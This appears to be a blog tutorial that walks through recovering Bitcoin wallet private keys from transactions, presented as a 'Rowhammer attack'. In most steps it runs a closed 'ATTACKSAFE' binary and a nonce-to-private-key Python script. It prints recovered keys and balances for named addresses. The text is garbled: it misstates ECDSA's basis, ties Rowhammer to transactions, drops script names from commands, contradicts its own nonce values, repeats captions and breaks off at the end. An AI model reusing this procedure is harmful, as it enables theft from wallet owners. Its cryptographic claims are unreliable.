How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

The biggest cryptographic strength of the Bitcoin cryptocurrency is a computational method in discrete mathematics that takes the problem of factorization of large integers and the problem of hidden numbers (HNP)in the Bitcoin signature transaction as a basis ECDSA.
In this article, we will apply Signature Fault Differential Analysis ECDSAand derive a private key from a transaction for five different Bitcoin Wallets.
Rowhammer Attack on Bitcoin, allows us to efficiently find all zeros for normalized polynomials modulo a certain value, and we adapt this method to a signature algorithm, ECDSAmore precisely, to critically vulnerable transactions in the Bitcoin blockchain.
We will apply multiplication by different powers of the same element of the finite field, which, oddly enough, can coincide and give us a certain function over the finite field, which can be specified using the Lagrange interpolation polynomial .

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

The theoretical part of this attack can be found in the article from the list of popular Bitcoin attacks: “Rowhammer Attack on Bitcoin”

From our early publications, we know that there are a lot of vulnerable and weak transactions in the Bitcoin blockchain, and in the process of our cryptanalysis, we found many Bitcoin Addresses where a large number of signatures ECDSAwere made with the disclosure of the secret key "K" (NONCE).

As a result, knowing the secret key, we can accurately obtain the private key to the Bitcoin Wallet.

Consider five Bitcoin Addresses:






Each Bitcoin Address made two critical vulnerable transactions:


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Disclosure of the secret key “K” (NONCE) in the Bitcoin blockchain

Open  [TerminalGoogleColab] .

Implementing an Efficient Rowhammer Attack Algorithm Using Our 15RowhammerAttack Repository

git clone

cd CryptoDeepTools/15RowhammerAttack/

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Install all the packages we need

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
sudo apt install python2-minimal


sudo python2

pip2 install -r requirements.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
S = 0x0bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff4
Z = 0x9d86bea51385f6a56835d0148e7f23a353605bab339127e800112307e6727d2d

To implement the attack and get the secret key, we will use the “ATTACKSAFE SOFTWARE” software

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Access rights:

chmod +x attacksafe
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)


./attacksafe -help
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
  -version:  software version 
  -list:     list of bitcoin attacks
  -tool:     indicate the attack
  -gpu:      enable gpu
  -time:     work timeout
  -server:   server mode
  -port:     server port
  -open:     open file
  -save:     save file
  -search:   vulnerability search
  -stop:     stop at mode
  -max:      maximum quantity in mode
  -min:      minimum quantity per mode
  -speed:    boost speed for mode
  -range:    specific range
  -crack:    crack mode
  -field:    starting field
  -point:    starting point
  -inject:   injection regimen
  -decode:   decoding mode
./attacksafe -version
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

"ATTACKSAFE SOFTWARE"includes all popular attacks on Bitcoin.

Let’s run a list of all attacks:

./attacksafe -list
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

then choose -tool: rowhammer_attack

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d

RawTX = 0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d

Let’s check with a Python

To do this, install the ECPy elliptic curve library :

pip3 install ECPy
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67 , 0xc6efa8de714dd94d7b659d8935aa9036ada6a2b541a03360901fc195fd0e2cf6)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
S = 0x0bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff4
Z = 0x9d86bea51385f6a56835d0148e7f23a353605bab339127e800112307e6727d2d

R          =    0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
point2gen  =   (0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67 , 0xc6efa8de714dd94d7b659d8935aa9036ada6a2b541a03360901fc195fd0e2cf6)


K = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o

Let’s use the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
S = 0x0bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff4
Z = 0x9d86bea51385f6a56835d0148e7f23a353605bab339127e800112307e6727d2d

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

PrivKey = aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932

Let’s open bitaddress and check:

ADDR: 1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
HEX:  aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 708.02

The potential threat of losing BTC coins lies in the critical vulnerability of the Bitcoin blockchain transaction, so we strongly recommend that everyone always update the software and use only verified devices.

With detailed cryptanalysis, we also found a critical vulnerability in 96c94c5b69c60ab4e3889b11fee54519fc6ff0f228f37554dd0dc766ab3909ef for the same Bitcoin Address TXID:

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
S = 0x282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad5
Z = 0x7270a25b48c53581f9babe8edcf27f9a038e7b57e817a8b242a49e2248bc71a7

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3

RawTX = 010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3

Let’s check with a Python

Let’s use the ECPy elliptic curve library :

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2 , 0x212c1b682ab25c069306f57725e904094c352014ea78903fbc153a129f3171e4)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
S = 0x282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad5
Z = 0x7270a25b48c53581f9babe8edcf27f9a038e7b57e817a8b242a49e2248bc71a7

R          =    0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
point2gen  =   (0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2 , 0x212c1b682ab25c069306f57725e904094c352014ea78903fbc153a129f3171e4)


K = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o

Let’s use  the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
S = 0x282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad5
Z = 0x7270a25b48c53581f9babe8edcf27f9a038e7b57e817a8b242a49e2248bc71a7

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

PrivKey = aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932

Let’s open bitaddress and check:

ADDR: 1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
HEX:  aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 708.02


With detailed cryptanalysis, we also found a critical vulnerability in Bitcoin Address:


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
S = 0x48c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f
Z = 0x51e6147848d2e81e2b6b71a5f2b29be5121752b88cc1d5e1392c001b04b4c2d9

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca

RawTX = 0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca

Let’s check with a Python

Let’s use the ECPy elliptic curve library :

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386 , 0x3f43332421ee70c0e0ccab01f0b916fdf087f1df6cd2227f6d8d7212a3e6f806)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
S = 0x48c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f
Z = 0x51e6147848d2e81e2b6b71a5f2b29be5121752b88cc1d5e1392c001b04b4c2d9

R          =    0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
point2gen  =   (0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386 , 0x3f43332421ee70c0e0ccab01f0b916fdf087f1df6cd2227f6d8d7212a3e6f806)


K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:18hhdfynnojmiMmBMsrkXNFWketq4mmDHB

Let’s use  the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
S = 0x48c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f
Z = 0x51e6147848d2e81e2b6b71a5f2b29be5121752b88cc1d5e1392c001b04b4c2d9

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

PrivKey = 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba

Let’s open bitaddress and check:

ADDR: 18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
HEX:  86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 708.99

The potential threat of losing BTC coins lies in the critical vulnerability of the Bitcoin blockchain transaction, so we strongly recommend that everyone always update the software and use only verified devices.

With detailed cryptanalysis, we also found a critical vulnerability in cfc6047c1ad23ddb9d3e0151217fe62f045429ffb225e878a07a0db6f98fb9b3 for the same Bitcoin Address TXID:

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
S = 0x052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9
Z = 0x395e27708f075827fc7b179382a2a5e13c7649a046a89f2937bc5754349cc05d

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383

RawTX = 0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca

Let’s check with a Python

Let’s use the ECPy elliptic curve library :

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88 , 0xbcf3873021aff3756d237abe2c29c074c77cd585d73a919135135150fcc30197)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
S = 0x052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9
Z = 0x395e27708f075827fc7b179382a2a5e13c7649a046a89f2937bc5754349cc05d

R          =    0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
point2gen  =   (0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88 , 0xbcf3873021aff3756d237abe2c29c074c77cd585d73a919135135150fcc30197)


K = 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:18hhdfynnojmiMmBMsrkXNFWketq4mmDHB

Let’s use  the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383
R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
S = 0x052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9
Z = 0x395e27708f075827fc7b179382a2a5e13c7649a046a89f2937bc5754349cc05d

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

